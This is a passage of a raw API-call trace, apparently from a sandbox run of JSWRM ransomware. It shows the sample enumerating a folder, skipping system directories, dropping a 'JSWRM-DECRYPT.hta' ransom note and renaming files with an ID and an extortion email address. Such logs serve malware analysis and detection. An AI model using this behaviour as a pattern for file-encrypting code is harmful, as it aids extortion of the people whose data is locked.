lpDistanceToMoveHigh=0x0) returned 0x0 [0068.692] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.693] CloseHandle (hObject=0x454) returned 1 [0068.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\jswrm-decrypt.hta")) returned 0x20 [0068.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0068.694] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8602, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f9bacd4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0068.694] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.694] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8602, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f9bacd4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.694] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.694] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.694] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f9bacd4, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f9bacd4, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f9bacd4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.694] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0068.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.695] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.695] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.695] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.695] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.695] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.695] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.695] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.695] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.695] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.695] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.695] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0068.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0068.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0068.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0068.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.696] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.696] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10093241867423728) returned 0 [0068.696] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.696] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.696] CloseHandle (hObject=0xffffffff) returned 1 [0068.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0068.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0068.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0068.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.696] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0068.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.696] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.697] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0068.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.697] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1aad768, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1aad768, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x109400, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0068.697] lstrcmpiW (lpString1="TipRes.dll", lpString2=".") returned 1 [0068.697] lstrcmpiW (lpString1="TipRes.dll", lpString2="..") returned 1 [0068.697] lstrcmpiW (lpString1="TipRes.dll", lpString2="...") returned 1 [0068.697] lstrcmpiW (lpString1="TipRes.dll", lpString2="windows") returned -1 [0068.697] lstrcmpiW (lpString1="TipRes.dll", lpString2="recovery") returned 1 [0068.697] lstrcmpiW (lpString1="TipRes.dll", lpString2="perflogs") returned 1 [0068.697] lstrcmpiW (lpString1="TipRes.dll", lpString2="documents and settings") returned 1 [0068.697] lstrcmpiW (lpString1="TipRes.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.697] lstrcmpiW (lpString1="TipRes.dll", lpString2="system volume information") returned 1 [0068.697] lstrcmpiW (lpString1="TipRes.dll", lpString2="msocache") returned 1 [0068.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipRes.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipRes.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipRes.dll", lpUsedDefaultChar=0x0) returned 10 [0068.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0068.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipRes.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipRes.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipRes.dll", lpUsedDefaultChar=0x0) returned 10 [0068.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0068.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.697] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5600, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="tipresx.dll", cAlternateFileName="")) returned 1 [0068.697] lstrcmpiW (lpString1="tipresx.dll", lpString2=".") returned 1 [0068.697] lstrcmpiW (lpString1="tipresx.dll", lpString2="..") returned 1 [0068.697] lstrcmpiW (lpString1="tipresx.dll", lpString2="...") returned 1 [0068.697] lstrcmpiW (lpString1="tipresx.dll", lpString2="windows") returned -1 [0068.697] lstrcmpiW (lpString1="tipresx.dll", lpString2="recovery") returned 1 [0068.698] lstrcmpiW (lpString1="tipresx.dll", lpString2="perflogs") returned 1 [0068.698] lstrcmpiW (lpString1="tipresx.dll", lpString2="documents and settings") returned 1 [0068.698] lstrcmpiW (lpString1="tipresx.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.698] lstrcmpiW (lpString1="tipresx.dll", lpString2="system volume information") returned 1 [0068.698] lstrcmpiW (lpString1="tipresx.dll", lpString2="msocache") returned 1 [0068.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0068.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll", lpUsedDefaultChar=0x0) returned 11 [0068.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0068.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll", lpUsedDefaultChar=0x0) returned 11 [0068.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.698] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79680792, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x79680792, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x79680792, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="tipskins.dll", cAlternateFileName="")) returned 1 [0068.698] lstrcmpiW (lpString1="tipskins.dll", lpString2=".") returned 1 [0068.698] lstrcmpiW (lpString1="tipskins.dll", lpString2="..") returned 1 [0068.698] lstrcmpiW (lpString1="tipskins.dll", lpString2="...") returned 1 [0068.698] lstrcmpiW (lpString1="tipskins.dll", lpString2="windows") returned -1 [0068.698] lstrcmpiW (lpString1="tipskins.dll", lpString2="recovery") returned 1 [0068.698] lstrcmpiW (lpString1="tipskins.dll", lpString2="perflogs") returned 1 [0068.698] lstrcmpiW (lpString1="tipskins.dll", lpString2="documents and settings") returned 1 [0068.698] lstrcmpiW (lpString1="tipskins.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.698] lstrcmpiW (lpString1="tipskins.dll", lpString2="system volume information") returned 1 [0068.698] lstrcmpiW (lpString1="tipskins.dll", lpString2="msocache") returned 1 [0068.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0068.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipskins.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipskins.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipskins.dll", lpUsedDefaultChar=0x0) returned 12 [0068.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0068.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipskins.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipskins.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipskins.dll", lpUsedDefaultChar=0x0) returned 12 [0068.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.699] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7965a52d, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x7965a52d, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x7965a52d, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x9e1a0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="tiptsf.dll", cAlternateFileName="")) returned 1 [0068.699] lstrcmpiW (lpString1="tiptsf.dll", lpString2=".") returned 1 [0068.699] lstrcmpiW (lpString1="tiptsf.dll", lpString2="..") returned 1 [0068.699] lstrcmpiW (lpString1="tiptsf.dll", lpString2="...") returned 1 [0068.699] lstrcmpiW (lpString1="tiptsf.dll", lpString2="windows") returned -1 [0068.699] lstrcmpiW (lpString1="tiptsf.dll", lpString2="recovery") returned 1 [0068.699] lstrcmpiW (lpString1="tiptsf.dll", lpString2="perflogs") returned 1 [0068.699] lstrcmpiW (lpString1="tiptsf.dll", lpString2="documents and settings") returned 1 [0068.699] lstrcmpiW (lpString1="tiptsf.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.699] lstrcmpiW (lpString1="tiptsf.dll", lpString2="system volume information") returned 1 [0068.699] lstrcmpiW (lpString1="tiptsf.dll", lpString2="msocache") returned 1 [0068.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.699] 